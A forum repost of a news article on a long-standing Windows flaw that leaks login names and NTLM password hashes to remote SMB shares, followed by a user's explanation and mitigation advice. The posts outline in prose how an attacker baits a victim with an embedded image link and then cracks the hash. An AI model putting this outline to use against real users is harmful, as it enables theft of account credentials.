Windows 10 Anniversary Update still has coding glitch that leaks data to hackers

[Petrovic]

Log-in data exploit first reported in 1997 is still around

MICROSOFT'S WINDOWS 10 Anniversary Update still contains an age-old coding glitch that's responsible for leaking log-in and password data to potentially undesirable people.

The exploit dates back to 1997 and involves Windows trying to log-in to any Server Message Block (SMB) by offering user credentials.

 

Thus, all an attacker has to do is set up an SMB network share and encourage the victim to visit the IP address set up to host it.

 

This leaks the Windows log-in name and NT LAN Manager hash of the password and Windows domain.

 

It was never seen as a particularly huge problem when this information was just local system log-in details, but Windows 8's love of attaching the log-in to online accounts on Microsoft Exchange, Hotmail or Office 365 upped the risk considerably.

 

Simply put, anything attached to that central log-in is now open to compromise, whether it's data stored on OneDrive, a Skype account, Office Xbox Live or even, we'd theorise, Cortana seeing as Microsoft insists that you sign into the assistant separately since the release of the Anniversary Update.

 

The Edge browser end user base is growing, so it's also now particularly easy for external forces to engineer navigation to the network share. Even something as simple as an embedded image in another website can act as an easy incentive.

 

VPN connections using Windows VPN software can also be targeted in the same way. If the network share is exploited through a VPN, the VPN's log-in credentials will be revealed instead.

 

VPN provider Perfect Privacy offers a test website which works only in Internet Explorer or Edge to determine how many of your details are leaking. Obviously, you use this at your own risk.

 

Chrome, Firefox and any other popular non-Windows browsers aren't ordinarily affected by this glitch. But seeing as everything else in Windows can be targeted, these browsers can easily redirect to Outlook or any number of other Windows applications.

Article source

[WALLONN7]

My five cents...

 

Spoiler

 

 

Discovered in 1997 by Aaron Spangler and never fixed, the WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4) is certainly an excellent vintage. In Windows 8 and 10, the same bug has now been found to potentially leak the user’s Microsoft Live account login and (hashed) password information, which is also used to access OneDrive, Outlook, Office, Mobile, Bing, Xbox Live, MSN and Skype (if used with a Microsoft account).

 

The bug itself seems to be present in all Windows systems since Windows 95 / NT, although only Windows 8 and above are effectively compromised. To see if your machine is affected, you may want to check the public demonstration of the exploit, set up by the guys from [Perfect Privacy] and based on [ValdikSS] original work.

 

The exploit as demonstrated by Xiaoran Wang et al. in the white paper.

Basically, the default User Authentification Settings of Edge/Spartan (also Internet Explorer, Outlook) lets the browser connect to local network shares, but erroneously fail to block connections to remote shares. To exploit this, an attacker would simply set up a network share. An embedded image link that points to that network share is then sent to the victim, for example as part of an email or website. As soon as the prepped content is viewed inside a Microsoft product such as Edge/Spartan, Internet Explorer or Outlook, that software will try to connect to that share in order to download the image. Doing so, it will silently send the user’s Windows login username in plaintext along with the NTLMv2 hash of the login password to the attacker’s network share.

Even though the original issue exists and is known since more than two decades now, its severity has crept in only lately. Back in 1997, the attacker would have only obtained your local Windows login data, but in Windows 10, the default login method is the user’s Microsoft Live account. An attacker may have to resort to GPU-assisted hash-cracking to retrieve the password from the NTLMv2 hash (or even not), but the result can be as thorough as full compromise, including the mentioned Microsoft services and even remote access.

To mitigate, use a firewall, strengthen your Microsoft Live account password and avoid using Microsoft products such as Edge/Spartan, Internet Explorer (just saying..) and Outlook, as well as VPN connections over IPSec, which may leak VPN credentials in the same way. Firefox and Chrome are not affected.

 

Source